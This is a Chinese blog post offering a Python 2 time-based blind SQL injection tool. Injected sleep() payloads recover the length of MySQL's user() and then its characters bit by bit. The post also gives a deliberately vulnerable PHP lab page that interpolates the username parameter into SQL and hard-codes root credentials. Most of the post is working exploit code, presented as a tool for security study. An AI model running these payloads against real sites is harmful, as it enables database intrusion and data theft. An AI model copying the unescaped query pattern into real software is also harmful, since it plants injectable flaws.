延迟注入工具(Python脚本)


延迟注入工具(python)


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 延迟注入工具
import urllib2
import time
import socket
import threading
import requests
class my_threading(threading.Thread):
    """One timing probe, executed on its own thread.

    ``str`` is the 1-based bit index j (1..8) and ``x`` the 1-based character
    position, as passed by getData().  The outcome (0 or 1) is written into the
    module-level dict ``res`` under the key ``str(j)``; getData() starts eight
    of these per character and reads ``res`` only after joining them, so the
    dict is not read concurrently with the writes.
    """
    def __init__(self, str,x):
        # NOTE(review): the parameter name shadows the builtin str() inside
        # __init__ only; run() below still resolves str to the builtin.
        threading.Thread.__init__(self)
        self.str = str
        self.x = x
    def run(self):
      global res
      x=self.x
      j = self.str
      # The query string carries the timing probe for character x, bit j of
      # user(): the server sleeps 2 s when the probed bit is 1.
      url = "http://localhost/pentest/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
      # request() returns the literal 'timeout' when its 2 s client timeout
      # fires -- or on any other exception (see request()), which is then
      # indistinguishable from a genuine delay.
      html = request(url)
      verify = 'timeout'
      if verify not in html:
        res[str(j)] = 0
        #print 1
      else:
        res[str(j)] = 1
def request(URL):
    """Fetch URL with a 2 s timeout.

    Returns the response body, or the literal string 'timeout' if urlopen()
    raised.  Callers (my_threading.run, getLength) test for that literal.

    NOTE(review): ``except Exception`` maps *every* failure -- connection
    refused, DNS errors, HTTP 4xx/5xx -- to 'timeout', so an unreachable or
    broken target reads exactly like a delayed response.  Python 2 only
    (urllib2, ``except Exception, e``).
    """
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    req = urllib2.Request(URL, None, user_agent)
    try:
        # Local name shadows this function for the rest of the body.
        request = urllib2.urlopen(req,timeout=2)
    except Exception ,e:
        # ``e`` is never used; the extra 2 s sleep pads every failed probe.
        time.sleep(2)
        return 'timeout'
    return request.read()

def curl(url):
    """Issue a GET with ``requests`` and return the process clock afterwards.

    Not referenced anywhere else in this listing.  ``start`` is assigned but
    never used, so the return value is ``int(end)`` -- the clock reading at
    completion -- not the elapsed time.  ``time.clock`` was removed in
    Python 3.8.  On a RequestException the whole interpreter is terminated
    via exit().
    """
    try:
        start = time.clock()
        requests.get(url)
        end = time.clock()
        return int(end)
    except requests.RequestException as e:
        print u"访问出错!"
        exit()

def getLength():
    """Return the length of user() by probing i = 0, 1, 2, ... in turn.

    Each iteration issues one request whose injected condition delays the
    response when length(user()) == i; the first i for which request()
    reports 'timeout' is returned.

    NOTE(review): there is no upper bound, so a target that never delays
    keeps the loop running indefinitely; conversely, because request() also
    returns 'timeout' on any error, an unreachable target makes this return
    0 on the first iteration.
    """
    i = 0
    while True:
        # '\r' overwrites the progress line in place.
        print "[+] Checking: %s \r" %i
        url = "http://localhost/pentest/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
        html = request(url)
        verify = 'timeout'
        if verify in html:
            print u"[+] 数据长度为: %s" %i
            return i
        i = i + 1

def bin2dec(string_num):
    """Parse a string of binary digits (e.g. ``'01000001'``) as an int."""
    return int(string_num, base=2)

def getData(dataLength):
    """Recover ``dataLength`` characters, one at a time, and print them.

    For each 1-based character position x, eight my_threading probes (bit
    indices j = 1..8) are started and joined; their 0/1 results are read
    from the module-level dict ``res``, concatenated MSB-first into an
    8-digit binary string and converted with chr(bin2dec(...)).

    Returns None; the accumulated string is only printed.
    """
    global res
    data = ""
    for x in range(dataLength):
        # Positions are 1-based (MySQL mid()/substring semantics).
        x = x + 1
        #print x
        threads = []
        for j in range(8):
            # Dead assignment: ``result`` is overwritten after the join below.
            result = ""
            j = j + 1
            sb = my_threading(j,x)
            sb.setDaemon(True)
            threads.append(sb)
            #print j
        for t in threads:
            t.start()
        # All eight probes must finish before ``res`` is read, so the dict is
        # never read while another thread is writing it.
        for t in threads:
            t.join()
        #print res
        tmp = ""
        for i in range(8):
            # Keys are the string form of j (see my_threading.run).
            tmp = tmp + str(res[str(i+1)])
        #print chr(bin2dec(tmp))
        # Rebinding the global (hence ``global res`` above) resets it for the
        # next character.
        res = {}
        result = chr(bin2dec(tmp))
        print result
        data = data + result
        # Drop the reference to the last thread object.
        sb = None
    print "[+] ok!"
    print "[+] result:" + data


# NOTE(review): as rendered this compares two undefined names; the guard is
# presumably ``if __name__ == '__main__':`` with the underscores lost in
# rendering -- confirm against the original file.
if name == 'main':
    # ``stop`` is assigned here but never read anywhere in this listing.
    stop = False
    # ``res`` must exist before the first my_threading.run() writes to it.
    res = {}
    length = getLength()
    getData(length)
可以用来搭建稍复杂一些的测试环境；下面的 PHP 脚本可按需修改。


<?php
/*
 * Time-based injection test page (deliberately vulnerable lab target).
 *
 * The Python script above sends its probes to this endpoint.  Do not
 * deploy outside an isolated test environment: credentials are hard-coded,
 * the query is built by string interpolation, and the raw query is echoed
 * back to the client.
 */
header("Content-type:text/html;charset=utf8");
// Hard-coded root credentials; the ext/mysql (mysql_*) API used here was
// removed in PHP 7.
$link = mysql_connect("localhost", "root","123456");
mysql_select_db("mysql", $link);
mysql_set_charset("utf8");
// Injection point: $_GET['username'] is interpolated into the SQL string
// with no escaping or parameter binding.  In real code this must be a
// prepared statement (mysqli or PDO with bound parameters).
$sql = "SELECT user FROM user where user='{$_GET['username']}'";
// Echoes the full query -- including the unescaped parameter -- to the
// response, so the input is also reflected verbatim into the HTML.
echo $sql;
// The result set is never read; only the query's execution time matters
// for the timing probes.
$query = mysql_query($sql);
echo "123123123";
?>


版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。


本文链接:延迟注入工具(Python脚本) - https://www.0dayhack.com/post-673.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全
